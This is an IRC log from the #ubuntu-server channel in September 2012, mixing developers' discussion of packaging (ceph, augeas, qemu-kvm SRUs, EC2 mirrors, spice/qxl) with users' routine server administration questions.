<jpds> apw: Your user needs to be in libvirtd.
<apw> jpds, yeah i started virtmanager with that in my group, ie. i logged out and in and it did not help
<jpds> apw: Hmm, works for me...
<apw> worked not for me
<AdvoWork> Hi all, after some advice please. Production server so in use all of the time, whats the best way of applying/installing updates, i would assume check these first, see if anything jumps out as a problem,and then just install? I dont want to install and have problems
<Daviey> apw: sort of.. you need to be added to a group.. so loging out and in should be enough
<Daviey> ah, read follow up
<Daviey> so no, shouldn't be required
<apw> Daviey, it wasn't ... and after trying to restart everything related i gave up and rebooted, which fixed
<lordievader> Good morning
<jamespage> SpamapS, pls can you ping me re ceph upload when you start
<jamespage> Daviey, having thought about it more I don't think that switch for python-ceph makes sense
<jamespage> it will be a delta we always have to maintain ontop of Debian
<Daviey> jamespage: yeah.. I agree.  I don't see why it was raised.. Where was it mentioned?
<jamespage> Daviey, irc when discussing which bits go to main
<jamespage> Daviey, I need to discuss with SpamapS as I think some of his additional changes relate to the upstart integration
<jamespage> which is still considered 'beta' so we don't ship the upstart configurations to support it.
<Daviey> jamespage: should i be accepting SpamapS's change or wait?
<jamespage> Daviey, hold of for the time being please...
<Daviey> okie
<zul> good morning
<jdstrand> jamespage: hi! on bug 1055416, you said that 1.466.2 is fixed, but upstream lists 1.466.2.1 as fixed
<uvirtbot> Launchpad bug 1055416 in jenkins "user data security issues in Jenkins" [High,Fix released] https://launchpad.net/bugs/1055416
<jamespage> jdstrand, thats for the Cloudbees enterprise distro
<jamespage> " LTS users should upgrade to 1.466.2"
<jdstrand> oh, I see
<jamespage> is the one applicable in quantal
<jdstrand> LTS users should upgrade to 1.466.2
<jdstrand> ok, thanks
<jamespage> jdstrand, I spent 30 mins trying to ID the commits but upstream are not that open about security fixes....
<jdstrand> jamespage: fwiw, it looks like they have a cloudbees with 1.424.6.11
<jdstrand> :\
<jamespage> jdstrand, the cloudbees distros build on the open-source LTS releases
<jamespage> I have todo the same but blind....
<jamespage> jdstrand, I've ping the upstream project lead for guidance and how to discuss
<jamespage> going forwards...
<jdstrand> jamespage: right, I just ment that precise has 1.424.6. maybe if it was possible to diff 1.424.6 and 1.424.6.11...
<jamespage> jdstrand, no source code for  1.424.6.11
<jdstrand> ah. hrmm
<jamespage> *almost* what I said when the bug report was raised in Debian...
<AdvoWork> how would i go about rename all symbolic links, im trying to change from S to K. I can see I can do sudo update-rc.d whatever stop, but it needs an NN, but i dont know this
<smb> jamespage, Do you know who else might still be knowledgable with the orchestra/cobbler scripts? I just tried an ubuntu-cobbler-import of quantal and there seems to be an issue with the md5 signing.
<jamespage> hmm
<jamespage> smb, roaksoax maybe - if its the script from the cobbler package?
<smb> jamespage, yes it is... actuall cobber-ubuntu-import...
<smb> roaksoax, ^ Would you know what could cause this
<smb> failed to verify MD5SUMS via /usr/share/keyrings/ubuntu-archive-keyring.gpg (http://archive.ubuntu.com/ubuntu/dists/quantal/main/installer-amd64/current/images/MD5SUMS)
<jamespage> smb, ah - actually that might be todo with the archive signing key changing - see ubuntu-devel ML
<smb> jamespage, Well yes, I suspected it could be related. Maybe a piece forgotten
<jamespage> smb, is this on a 12.04 system?
<smb> yes
<smb> And that keyring only has the 1K key on it
<smb> Hm, maybe I should ask that cjwatson
<lordievader> Good afternoon
<smb> jamespage, Ok, manually adding the new keys works for now
<jamespage> smb, good oh
<Daviey> smb: did you see my follow up?
<irv> how to restart networking daemon in ubuntu server 12.04 ?
<smb> Daviey, Which follow up on what?
<irv> nm, got it, sudo /etc/init.d/networking restart
<smb> Daviey, jamespage There will be a SRU for the keyring in 12.04
<jamespage> yep
<Daviey> smb: that was what i question on ubuntu-devel...
<Daviey> https://lists.ubuntu.com/archives/ubuntu-devel/2012-September/035910.html
<SpamapS> jamespage: awake
<SpamapS> jamespage: since its been a weekend since I did the ceph upload on Friday.. can you summarize for me what changes I had from the ones you did?
<jamespage> SpamapS, hey - so minor confusion on my part this morning - the one place I did not look for you ceph upload was the unapproved queue :-)
<jamespage> SpamapS, np
<SpamapS> jamespage: yeah I should have pushed it to lp:ubuntu/ceph
<jamespage> SpamapS, so I had picked the new binary for installation - ceph-keys-prepare or whatever
<SpamapS> jamespage: I thought I pulled that in to the ceph package based on upstream's debian dir.  I think.
<jamespage> SpamapS, I did look at the additional entries for ceph.dirs, but decided not to take those changes as there are related to upstart support
<jamespage> which we don't ship
<jamespage> at least I think so
<SpamapS> jamespage: why don't we ship that yet?
<SpamapS> that seems.. a bit weird! ;)
<ninjix> good morning, everyone
<ninjix> looking for a Ubuntu sysad input on setting up UPS power management for my 12.04 host nodes.
<jamespage> SpamapS, 'upstart: basic support for monitors, mds, radosgw; osd support still a work in progress.' - that was from 0.48 release notes
<jamespage> as it was only partial I chose not to include it
<ninjix> I familiar with NUT but was wondering what others are using.
<jamespage> SpamapS, I see
<jamespage> upstart: start everyone on a reboot
<jamespage> upstart: always update the osd crush location on start if specified in the config
<jamespage> in 0.48.2 release notes...
<jamespage> SpamapS, I'm reluctant to switch to using upstart this late in the cycle
<SpamapS> jamespage: I am worried about incompatibility between our packages and upstream's
<SpamapS> jamespage: they didn't add upstart in 0.48.2 ... did we hold it back in 0.48 for some reason?
<jamespage> SpamapS, I don't think compatibility is an issue
<uvirtbot> New bug: #1055505 in nova (main) "nova-vncproxy conflicts with novnc" [Undecided,New] https://launchpad.net/bugs/1055505
<jamespage> SpamapS, found it " Likewise, the upstart support is still incomplete and not recommended; we will backport that functionality later if it turns out to be non-disruptive." 0.48 release notes
<jamespage> knew I had read that somewhere
<jamespage> SpamapS, I'll ask upstream
<jamespage> zul, updating my panda to see if the radosgw issue has gone away...
<zul> jamespage: was there suppose to be two radosgw processes?
<jamespage> zul, I don't think so
<zul> jamespage: okies
<zul> hallyn: ping when you are around
<hallyn> zul: 'sup?
<zul> hallyn: have you seen soren's patches for qemu-kvm?
<hallyn> zul: the ones for precise, to fix the bridging network issues?
<hallyn> or a set he wrote himself?
<hallyn> if former, yes, if latter, no
<zul> hallyn: the one in the ubuntu-virt ppa
<hallyn> zul: yeah.  we're waiting for confirmation that it solves the named bug.
<zul> hallyn: i saw at least one confirmation this morning :)
<hallyn> zul: ah, excellent.  that's plenty then.  want to push it to precise-proposed?  :)
<zul> sure! :)
<hallyn> zul: that was one of the biggest migraine-inducing bugs in awhile
<zul> hallyn: yeah i know
<aboSamoor> Hi, I have an ubuntu server with 145 TiB in three md arrays with RAID6 implmented, when we use NFS we get a memory leak, any recent bug or similar issues appeared recently?
<jamespage> zul, nope - still get it "*** glibc detected *** /usr/bin/radosgw: free(): invalid pointer: 0xb66f9df4 ***
<jamespage> "
<zul> jamespage: meh..
<AdvoWork> would time stop an rsync, ie: time rsync -azx --stats --progress -numeric-ids --bwlimit=500 /mnt/test/ /mnt/test2  it says "DRY RUN" at the end?
<hallyn> zul: i'm nto quite sure what we put down as 'test case' for the SRU justification in that one
<zul> hallyn: what about the netcat
<hallyn> i guess.  just not many ppl can actually reproduce it.  i never could
<uvirtbot> New bug: #1055581 in python-tx-tftp (main) "FTBFS in Quantal test rebuild" [High,In progress] https://launchpad.net/bugs/1055581
<iqualfragile> allright: i have several accounts saved into an ldap-directory, and i can log into my clients using that credentials
<iqualfragile> now i want kerberos to use the accounts including the passwords in the directory as principials and the clients to automaticly mount the users home-directroy from the server using kerberos-authed nfs (i allready got the automounting part)
<iqualfragile> can someone point me to a bit of documentation? i could not find any
<adam_g> hallyn: ping
<hallyn> adam_g: .
<adam_g> hallyn: any thoughts on https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1035172 ? this is the issue that was blocking me from testing your libvirt last week on quantal. seems 'vhost=on' by default is the culprit
<uvirtbot> adam_g: Error: Could not parse data returned by Launchpad: The read operation timed out
<hallyn> adam_g: i'll look at it and get back to you (break for lunch)
<uvirtbot> New bug: #1049146 in cloud-init (main) "cloud-init runs again after reboot in release upgraded instance" [Medium,Fix released] https://launchpad.net/bugs/1049146
<adam_g> hallyn: cool
<uvirtbot> New bug: #1002155 in cloud-init (main) "dpkg-reconfigure cloud-init doesn't show CloudStack" [Medium,Triaged] https://launchpad.net/bugs/1002155
<adam_g> zul: is there a bug for that keystone upgrade thing?
<zul> adam_g: not yet
<adam_g> zul: how did you hit that? with what config were you trying to upgrade? just the default, or something modified?
<zul> adam_g: https://github.com/StackGeek/openstackgeek
<adam_g> zul: ?
<zul> adam_g: just a bunch of scripts that does an openstack install for you
<b0ot> Does anyone have a suggestion for any sort of distributed messaging/email system. I'm looking for something where all the servers are replicating all the data across the network. Where users can talk with one another based on something like username/ip and then if they try to send a message and the user isn't available they recieve the message when they get online
<mwynne> not sure if it does messaging but for open source email you could look at Zimbra
<mwynne> I used the email server and really liked it.
<zul> adam_g: ok the database stuff for me is clearly not working for me
<zul> adam_g: meaning im doing something non-standard
<adam_g> zul: file a bug with the openstack geek squad? :)
<zul> adam_g: yeah :p
<adam_g> zul: keystone upgrade with an unpopulated database and default configs seems to work fine, FWIW
<hallyn> adam_g: well jinkeys, the email thread you list is from 2010.  and there was no followup?  they were ignored?
<adam_g> hallyn: didn't really follow the thread entirely, but it got me looking in the right place. vhost=on by default breaks DHCP without the required iptables rules
<adam_g> vhost=on by default seems to be new to quantal (libvirt, i assume)
<hallyn> adam_g: yes, there was a bug about something like that before.
<hallyn> adam_g: don't we now add that rule for virbr0?
<adam_g> hallyn: maybe. have not checked for that, actually. if thats the case, perhaps we can get it added to the rules nova sets up for its instances (it doesn't use virbr0)
<adam_g> hallyn: ya, looks like it: -A POSTROUTING -o virbr0 -p udp -m udp --dport 68 -j CHECKSUM --checksum-fill
<adam_g> hallyn: is that rule something specific to our packaging or standard libvirt practice now?
<hallyn> adam_g: https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1029430
<uvirtbot> Launchpad bug 1029430 in libvirt "KVM guests networking issues with no virbr0 and with vhost_net kernel modules loaded" [Low,Triaged]
<adam_g> hallyn: ah! thanks
<hallyn> adam_g: i think libvirt does it for all of its networks
<hallyn> adam_g: i assume nova manually creatis its own bridge?
<adam_g> hallyn: yes, and goes about managing its own set of iptables rules per-guest/security group
<adam_g> hallyn: gonna tag that as a nova bug as well
<hallyn> adam_g: maybe mark it as a dup of 1029430
<hallyn> maybe not
<uvirtbot> New bug: #1029430 in libvirt "KVM guests networking issues with no virbr0 and with vhost_net kernel modules loaded" [Low,Triaged] https://launchpad.net/bugs/1029430
<uvirtbot> New bug: #1055688 in cloud-init "host keys not written to console" [High,In progress] https://launchpad.net/bugs/1055688
<stgraber> hallyn: can you push 0222-debian-dhcp3-package to your git tree?
<njin> balloons, this isn't working for me: Test-case dash/lens-preview-music
<njin> ops, wrong chan
<hallyn> stgraber: ok
<hallyn> stgraber: but i see it's in lxc/lxc.  any reason why i shouldn't just clone that over?
<hallyn> stgraber: well, pushed just that one for now
<stgraber> hallyn: commit message is a bit confusing, will do a tiny bit of editing when pulling ;)
<hallyn> stgraber: thanks
<hallyn> i'm a bit scatterbrained.  too many open tasks
<hallyn> stgraber: do you happen to know if anyone actually runs/tests the powerpc iso's?
<hallyn> wondering if what i'm seeing is a bug in my qemu-system-ppc, or in the openbios blob, or in the ubuntu powerpc iso
<stgraber> hallyn: some lubuntu folks are. The others usually suffer by lack of testers.
<hallyn> stgraber: ok, thanks.  i'll try to drop by and ask them
<stgraber> hallyn: looking on the tracker, the lubuntu desktop image was booting on the 24th, though with quite badly broken desktop apparently
<hallyn> stgraber: i was trying the alternate installer.  sounds like that's just untested :)  will try server and then lubuntu
<stgraber> hallyn: change applied to staging
<gabrtv> it's been about a week and i'm still seeing intermittent issues with the EC2 repository mirrors
<gabrtv> http://stackoverflow.com/questions/12438946/e-unable-to-locate-package-git-ubuntu-on-ec2/12571429#12571429
<gabrtv> apt-get install git gives: E: Unable to locate package git
<gabrtv> apt-get update, try again.. maybe it works, maybe not..
<sarnold> have you found one or another mirror that works better than others?
<gabrtv> sarnold: https://gist.github.com/7448ce4edf141b22643f
<zul> adam_g: ping for cinder you dont have to specify the -z cinder anymore
<sarnold> gabrtv: amazing. The second apt-get update downloads _more_ data than the first run!
<gabrtv> looks to me like http://us-east-1.ec2.archive.ubuntu.com works, and http://archive.ubuntu.com is busted
<gabrtv> but not 100% on that
<gabrtv> also, not sure how apt chooses which mirror to use.. the errors are pretty random.. sometimes works on attempt 1, other times attempt 2 or 3
<gabrtv> sarnold: something's badly awry w/ those mirrors.. i'm surprised i'm the only one who's noticed!
<gabrtv> it's us-east-1 after all ;)
<sarnold> gabrtv: agreed that something seems strange there. I generally dislike hard-coding specific servers though...
<gabrtv> smoser: saw your name as working on some of the EC2 mirrors, any thoughts?
<smoser> gabrtv, can you pastebin an error ?
<gabrtv> smoser: https://gist.github.com/7448ce4edf141b22643f
<gabrtv> corresponding shell at: http://stackoverflow.com/questions/12438946/e-unable-to-locate-package-git-ubuntu-on-ec2/12571429#12571429
<smoser> gabrtv, it would seem maybe your stderr went un-captured ?
<gabrtv> yeah the exec environ is tty-less, over ssh
<smoser> ie, the output doesn't give any hints
<gabrtv> the point is that looping over apt-get update will eventually let me install `git`
<gabrtv> sorry the formatting isn't more clear
<gabrtv> btw - this is us-east-1, if that wasn't clear
<smoser> gabrtv, right. i understood the problem.
<smoser> but you've not captured output that would help me figure out why
<gabrtv> let me see if i can get better log output
<hallyn> zul: weird, every time i try to make a change to bug 997978 (to mark the non-qemu-kvm bugs invalid) it times out
<uvirtbot> Launchpad bug 997978 in qemu-kvm "KVM images lose connectivity with bridged network" [High,Confirmed] https://launchpad.net/bugs/997978
<zul> wanna me try?
<zul> times out for me
<stgraber> hallyn: let me try some magic
<stgraber> hallyn: ok, even the API times out. Trying another way of killing those bug tasks.
<stgraber> hallyn: gone
<three18ti> how do I add swap space to ubuntu-server?  I'm trying to follow the instrictions here: https://help.ubuntu.com/community/SwapFaq, but when I run dd it just creates a file that size...  should I replace /mnt/swap with the actual device that is to be swap?  (/dev/vdb in this case)
<hallyn> stgraber: thanks!
<stgraber> (marking invalid didn't work, but removing them completely did)
<utlemming> smoser: here
<hallyn> stgraber: from the api, or you could do it from the web interface?
<stgraber> hallyn: I can remove tasks from the web interface. Not sure if that's something that's restricted to release-team/project-owners though
<stgraber> hallyn: basically, if you can remove a task, you'll see a minus sign next to the package name (in a red circle). Click on that will remove the task completely
<uvirtbot> New bug: #1055658 in libvirt (main) "Under load, libvirt fails to start VMs concurrently" [Undecided,Fix released] https://launchpad.net/bugs/1055658
<gabrtv> smoser: looks like the problem is a race condition w/ cloud-init.. archive.ubuntu.com doesn't have the `git` package, but the mirror does!
<hallyn> stgraber: yeah i don't see that
<hallyn> zul: i've just added sru description to bug 997978.  Did you push the ppa pkg to precise-proposed yet?
<uvirtbot> Launchpad bug 997978 in qemu-kvm "KVM images lose connectivity with bridged network" [High,In progress] https://launchpad.net/bugs/997978
<smoser> gabrtv, that doesn't make sense.
<smoser> the mirror is a mirror :)
<zul> hallyn: not yet...i didnt know you want me to
<smoser> gabrtv, utlemming might be able to help you some more.
<smoser> utlemming, gabrtv is having potential issue with the mirrors on ec2
<utlemming> garbrtv, smoser: what's going on?
<gabrtv> smoser: appreciate it
<smoser> https://gist.github.com/7448ce4edf141b22643f and http://stackoverflow.com/questions/12438946/e-unable-to-locate-package-git-ubuntu-on-ec2/12571429#12571429
<hallyn> zul: sorry, thought you had said you were going to.  i'll do it then, no worries.
<soren> I can do, too, if you want.
<zul> hallyn: cool
<gabrtv> utlemming: the gist output is from an automated SSH exec.. it starts off using the archive.ubuntu.com repositories, in which it can't find `git`.. and then switches to the ec2 mirror repo (presumably due to cloud-init completing).. after which it can find the package
<hallyn> soren: please go ahead
<soren> hallyn: Will do.
<hallyn> drat i don't have the rights to push the sync'd augeas
<utlemming> garbtv: this is most unusual...but I wonder.....give me a couple of minutes
<hallyn> zul: can you sponsor http://people.canonical.com/~serge/augeas-sync/augeas_0.10.0-1fakesync1.dsc ?
<zul> hallyn:  i suppose so
<hallyn> zul: thanks!
<hallyn> i would think augeas should be in the server upload set...
<zul> hallyn:  404 on the tarball though
<hallyn> grimace
<hallyn> zul: oh.  on the .orig.  bc we're keeping the ubuntu one
<zul> yeah
<hallyn> zul: yeah so i kept it out of there to make sure i didn't copy the wrong one :)  (since it's in the archive).  but i just pushed it, pls retry dget
<zul> curl: (22) The requested URL returned error: 404 Not Found
<zul> i think you need to update your changes
<hallyn> zul: got it.  silly me.  re-pushed.  i can now dget+extract
<utlemming> grabtv: can you put your script into apt debug mode for me?
<zul> hallyn: uploaded
<hallyn> zul: thanks!
<hallyn> sorry about the mess
<gabrtv> utlemming: is there a cmdline switch?
<utlemming> grabtv: try -o "Debug::Acquire::Http=True"
<gabrtv> sure thing
<gabrtv> utlemming: here ya go http://pastebin.com/z34Bgz8v .. was able to reproduce the same race condition.. check out line 1027
<gabrtv> sorry, 1017
<Daviey> SpamapS: hey, did you disucss ceph with jamespage earlier?
<SpamapS> Daviey: we did
<SpamapS> Daviey: I think either upload is fine. Mine was just adding a few dirs that are not 100% necessary
<Daviey> SpamapS: i dropped Jamespage's.. just waiting on your nod to accept yours.
<Daviey> I assume i should progress?
<SpamapS> Daviey: yes please! :)
<Daviey> SpamapS: accepted
<uvirtbot`> New bug: #1046432 in quantum (universe) "FFE for quantum" [High,Won't fix] https://launchpad.net/bugs/1046432
<SpamapS> 50 upgraded, 0 newly installed, 0 to remove and 2 not upgraded.
<SpamapS> Need to get 46.0 MB of archives.
<SpamapS> need.. new.. cloud..images...
<gabrtv> utlemming: not sure if you got my message beforeâ¦  http://pastebin.com/z34Bgz8v .. was able to reproduce the same race condition.. check out line 1017
<uvirtbot`> New bug: #978127 in cloud-init "incorrect time on node causes failed oauth" [Medium,In progress] https://launchpad.net/bugs/978127
<utlemming> gabrtv: sorry, about that....on the phone...looking
<utlemming> garbtv: can you send me your script
<gabrtv> utlemming: http://pastebin.com/JKewkpbF ..
<gabrtv> to reproduce the error on EC2 you'll have to run it before cloud-init finishes
<TDJACR_> Does anyone know of a good socks 5 proxy with UDP support?
<adam_g> SpamapS: ping
<SpamapS> adam_g: pong, talk quickly, must go in 6 minutes
<adam_g> SpamapS: just wondering about that  openvswitch 1.4.0-1ubuntu1.3 upload thats still sitting in queue for precise-proposed. is there something blocking it?
<SpamapS> adam_g: mostly just the release/SRU teams being busy w/ othe rthings
<adam_g> SpamapS: yea, figured as much.
<SpamapS> adam_g: I only did 1 SRU last week .. many others were similarly distracted
<SpamapS> adam_g: and w/ quantal getting closer....
<SpamapS> tough to put much energy into the smoldering embers of 12.04 when quantal is approaching 3-alarms ;)
<adam_g> yup
#ubuntu-server 2012-09-25
<addisonj> blah, I need to source a server tonight, something I haven't done in a few years, anyone got recommendations for something with 16 or so cores (intel or amd), 16gb+ ram, dual psu and decent management stuff (ilo or equivalent)?
<Mr_Queue> http://www.thinkmate.com/System/RAX_QS4-1110/25343
<Mr_Queue> http://www.thinkmate.com/Computer_Systems/Rackmount_Servers/Thinkmate_Servers
<MTecknology> Any of you guys happen to use OpenVZ and UFW? I can't seem to get the two to play nice together. As soon as I run ufw enable in the guest I can't talk to the guest anymore. Even running iptables -F will keep me locked out until I run ufw disable.
<uvirtbot> New bug: #1055892 in keepalived (main) "keepalived does not honor use_vmac directive" [Undecided,New] https://launchpad.net/bugs/1055892
<uvirtbot> New bug: #1055896 in samba (main) "package winbind 2:3.6.3-2ubuntu2.3 failed to install/upgrade: el subproceso instalado el script post-installation devolviÃ³ el cÃ³digo de salida de error 1" [Undecided,New] https://launchpad.net/bugs/1055896
<MTecknology> Are there any nice iptables front ends that play well with openvz containers?
<AtomicSpark> I found out the other night and thought I would mention (though, probably you all know or dont care) that virtualenv for python uses absolute paths and if you move the created directory, all sorts of awkwardness happens. There is an option to convert to relative, but I dont know what I broke in the mean time and had to start over.
<AtomicSpark> Thanks for those who suggested it though. Virtualenv is pretty awesome.
<linocisco> who is using glpi ?
<uvirtbot> New bug: #1055935 in maas (main) "dhcpd.conf is not updated after package install" [Undecided,Confirmed] https://launchpad.net/bugs/1055935
<ChmEarl> can precise still boot from /boot on ext2 partition?
<sarnold> my precise has an ext3 /boot -- they're near enough, right?
<ChmEarl> sarnold, yes - I was able to read kern.log and ext /boot is working. The log stopped in udev because of video
<ChmEarl> ext2 boot is working
<sarnold> ChmEarl: oh, you didn't get stuck with that intel-video-dead problem going around did you?
<sarnold> (well, maybe that's just suspend-resume or once X is running.. I haven't paid attention to details)
<ChmEarl> um maybe... I added `text` to the kernel line
<ChmEarl> as a workaround
<ChmEarl> still not completing boot
<sarnold> Hrm. :/
<ChmEarl> sarnold, it now boots and gets network, only now ssh is not working... small problem
<sarnold> ChmEarl: you've got the most interesting problems :)
<ChmEarl> bridge-utils was not installed
<ChmEarl> working now
<sarnold> ChmEarl: thanks for the report. I'll try to remember :)
<ztane> anyone knows why supervisord restart / stop does not actually stop supervisord on precise
<RoyK> what is supervisord?
<ztane> ah, pidfile does not seem to exist even
<ztane> a daemon to monitor other daemons and service programs
<RoyK> something like puppet?
<ztane> more limited scope
<ztane> just monitors services and restarts them as needed, redirect logs etc...
 * RoyK prefers puppet, then
<ztane> this is not about mgmt, just monitoring of own sys software
<ztane> anyway, ubuntu startscripts seem to be b0rken
<RoyK> sorry, don't know, I'm usually using other software for monitoring
<RoyK> that is, I hadn't heard of supervisord before you told me ;)
<HorzA> is there a juju channel?
<rbasak> HorzA: #juju
<HorzA> thanks :D
<uvirtbot> New bug: #1055951 in maas (main) "maas-dhcp has no sudoers permission to start maas-dhcp-server" [Undecided,New] https://launchpad.net/bugs/1055951
<th0mz> anybody have samba segfault please ?
<th0mz> Ubuntu 12.04
<ikonia> just state YOUR problem
<th0mz> samba is linked to a domain
<ikonia> what others have doesn't matter
<th0mz> *** glibc detected *** smbd: free(): invalid pointer: 0x00007fe6c008e220 ***
<ikonia> more so as a sefault will probably contain information specific to your system
<th0mz> *** glibc detected *** smbd: free(): invalid pointer: 0x00007fe6c008be20 ***
<th0mz> oups
<th0mz> mmh
<ikonia> that's not really going to tell us much
<ikonia> you need to get a dump and analyise it with debug tools
<ikonia> also worth looking on launchpad for similar bugs with the same version of samba
<th0mz> ok , i go to launchpad
<th0mz> maybe if you see something special
<th0mz> http://paste.ubuntu.com/1226116/
<th0mz> maybe an error message i missed
<ikonia> I just told you - you need a dump/stack trace to analyise
<th0mz> i have no segfault when using a local user
<th0mz> i try to feel launchpad report with this.
<chmac> Can I somehow force all files in a specific directory to be owned by a specified group and always writable to that group?
<chmac> I feel like maybe there's something around bitmasks or something that will do the job, but I'm not sure how to research it online without the appropriate terminology.
<fdge> chmod g+s
<fdge> chmac
<zertux> Hi
<zertux> i have a small question
<zertux> I have a server running Ubuntu server 12.04 LTS with 2 x Hexa-Core Xeon E5649 2.53GHz w/HT and 32GB of ram
<zertux> http://s11.postimage.org/qwtwgxckz/Screenshot_from_2012_09_25_12_06_28.png
<zertux> The server serves as website
<zertux> average of connections are 800 at the same time
<zertux> each user runs about 50 mysql queries (select, insert) (small values nothing big)
<zertux> from the pic above, i see few cores are busy while the rest are idle
<fdge> you don know most people that use computers have a short attention span?
<zertux> fdge: sorry for the lag i guess ?
<fdge> and getting to your question over multiple lines is not the best
<zertux> sorry
<zertux> am working :(
<fdge> I don't care, just letting you know
<zertux> the question is, is it normal ? do i have to configure ubuntu server to share the load among the cores or is it mysql related ?
<chmac> fdge: Thanks, I'll check that out
<fdge> zertux, my for sure answer is I don't know
<fdge> you might have to tell your webserver to "use more threads"
<zertux> webserver or mysql ?
<zertux> the website is running fast and fine
<zertux> but i just wanted to know why the load is on some cores and the rest are idle
<uvirtbot> New bug: #1056070 in samba (main) "segfault in samba with Active Directory users " [Undecided,New] https://launchpad.net/bugs/1056070
<koolhead17> hi all
<uvirtbot> New bug: #1056072 in php5 (main) "php5-dev missing mysqlnd header files" [Undecided,New] https://launchpad.net/bugs/1056072
<koolhead17> Daviey: ping
<Daviey> koolhead17: hey
<koolhead17> Daviey: RC2 RC2 :P
<linocisco> Experience of transfering MySQL database from XAMPP to ubuntu server LAMP is appreciated
<Daviey> koolhead17: \o/
<koolhead17> Daviey: i don`t see Quantum in the list though :(
<Daviey> koolhead17: Ugh
<uvirtbot> New bug: #1056103 in ceph (main) "no docs package / html docs" [Undecided,New] https://launchpad.net/bugs/1056103
<patrickgamer> is there a set of specialized/customized Ubuntu Server images for small devbox use (read: dedicated Apache, dedicated MySQL, etc. with low system requirements)? I don't want to spend the time tweaking if I don't have to.
<RoyK> hm... how long has /dev/disk/by-id been around?
<RoyK> patrickgamer: no, just install a standard machine with ssh only, and apt-get the rest
<patrickgamer> RoyK:  k thanks. Do you think there'd be an interest in it? similar to https://github.com/xdissent/ievms
<RoyK> patrickgamer: dunno - I don't think I'd have bothered. It takes a very short time to install a basic Ubuntu server from a USB stick, or even a CDROM, and that can be used for anything...
<patrickgamer> kk - just thought it'd be nice to use as part of an automatic deploy or whatever. thanks
<SpamapS> RoyK: disk/by-id I think was in 10.04, but might have been 10.10
<RoyK> SpamapS: didn't know that one - nifty :)
<nsudo> how to build a lamp in a virtual way
<SpamapS> nsudo: start with a light bulb, maybe some copper?
<SpamapS> nsudo: do you mean a web service based on mysql and php?
<patrickgamer> RoyK: fyi someone just sent me this link. http://www.turnkeylinux.org/mysql
<RoyK> patrickgamer: ?
 * RoyK wonders if patrickgamer is a spambot
<Pici> RoyK: looks more like someone just not paying enougbattention to irc.
<Pici> wow, I really messed up that word.   "enough attention"
<soren> Well, the 'b' key is right in between the 'h' key and the space bar. It could have been much worse :)
<patrickgamer> not a spam bot
<patrickgamer> i just thought i'd follow up b/c RoyK said there weren't pre-made images. So I thought i'd share
<patrickgamer> also - at work, so not watching the channel intently
<patrickgamer> i prefer the pre-mades b/c it'll be easier to automate devbox deployments - and I don't have to worry about implementing standards or anything myself
<lordievader> Good afternoon
<hallyn> stgraber: fwiw, the ubuntu server (precise) installer ran great on powerpc (qemu, 32-bit).  Only problem was it didn't install a bootloader.
<stgraber> hallyn: hmm, ok... :)
<stgraber> hallyn: btw, I'm trying to get libvirt to work with spice. After intalling all the right packages, I managed to get libvirt to start with it, getting a VM to boot but for some reason X doesn't seem to use the qxl driver and instead gets me the failsafe dialog. Any idea what I'm missing?
<hallyn> stgraber: i was mostly curious for an alternative to porter-ppc, i dont' know how much work we can legitimately put into it, given the # of apparent interested users
<hallyn> stgraber: are you using virt-mangaer?
<stgraber> hallyn: yep
<hallyn> stgraber: what's the resulting kvm cmdline?  is this on quantal server and client?  are you using spicy to connect?
<stgraber> hallyn: cmdline: http://paste.ubuntu.com/1226690/
<stgraber> that's a quantal VM on a quantal host
<stgraber> and I'm using virt-manager to attach to the display (I installed python-spice-client-gtk)
<stgraber> spicy and spicec give the same result though
<stgraber> I see grub and the boot just fine, then X starts in failsafe mode asking me what I want to do as it couldn't figure out a working config
<hallyn> stgraber: it's possible that the installer is doing a mode qxl/spice can't handle, but i thought the desktop installer didn't do that.
<hallyn> stgraber: can you try a separate vm, using https://wiki.ubuntu.com/SergeHallyn_spice ?
 * hallyn downloading http://cdimage.ubuntu.com/dvd/current/quantal-dvd-amd64.iso
<stgraber> hallyn: same result with the manual kvm-spice command, X starts and I get the failsafe dialog
<stgraber> that's when booting yesterday's daily
<hallyn> stgraber: i'm afraid that may be an issue with the qxl driver then
<stgraber> looks like it
<hallyn> what exactly does the failsafe dialog look like?
<hallyn> (i just ran the precise installer under spice this morning with no problems)
<stgraber> hallyn: gtk dialog saying "The system is running in low-graphics mode" "Your screen, graphics card, and input device settings could not be detected correctly. You will need to configure these yourself.
<stgraber> "
<hallyn> stgraber: i wonder if you continue with the install, after reboot will you get accel graphics?
<stgraber> I don't think so, because booting an already installed system gave the same result
<stgraber> one thing that's weird is that looking at the X startup messages, they actually look good...
<stgraber> so it's entering the failsafe mode with an X server apparently running qxl and without any actual error in the logs...
<hallyn> what decides whether to ru n failsafe ?
<stgraber> in theory a crash of the X server (or at least a non-zero return code)
<stgraber> hallyn: Xorg.0.log: http://paste.ubuntu.com/1226714
<hallyn> stgraber: change of locale, biab
<hallyn> stgraber: any chance you could get the log from a precise desktop guest?  i really don't know what the log is supposed to look like :)
<agc93> anyone know whether it's possible to connect to a PPTP VPN (running on an Ubuntu server) on a non-standard port?
<stgraber> hallyn: downloading a 12.04.1 image now to compare
<hallyn> zul: can i trouble you for one more augeas upload?  (debdiff is attached to bug 1054306)
<uvirtbot> Launchpad bug 1054306 in netcf "ncftool list fails" [High,Invalid] https://launchpad.net/bugs/1054306
<zul> hallyn: yeah gimme a sec
<hallyn> zul: no hurry - thanks
<zul> hallyn: this one right? augeas (0.10.0-1fakesync1ubuntu1) quantal-proposed;
<hallyn> zul: yeah.  btw is my naming on that sane?
<hallyn> also daviey was suggesting we don't need to do quantal-proposed yet, but...
<zul> yeah looks alright
<hallyn> zul: ok
<hallyn> stgraber: i think the thing to do (as before with qxl issues) will be to install the -dbg pkg and look at resulting core
<hallyn> stgraber: i can aim to do that this afternoon, if you don't have time today
<stgraber> hallyn: yeah, I think I'll just confirm that precise works here, then revert to regular kvm as I really need to do iso testing ;)
<hallyn> stgraber: sounds good, thanks for finding this.  ttyl
<uvirtbot> New bug: #1056248 in squid3 "assertion failed: AclProxyAuth.cc:229: "authenticateUserAuthenticated(Filled(checklist)->auth_user_request)" " [Undecided,New] https://launchpad.net/bugs/1056248
<stgraber> hallyn: 12.04 looks fine
<stgraber> hallyn: Xorg.log on 12.04: http://paste.ubuntu.com/1226806
<zul> Daviey: can you promote python-tornado please
<Daviey> zul: bug?
<zul> https://bugs.launchpad.net/ubuntu/+source/python-tornado/+bug/1047432
<uvirtbot> Launchpad bug 1047432 in python-tornado "[MIR] python-tornado" [Critical,Fix committed]
<Daviey> thanks
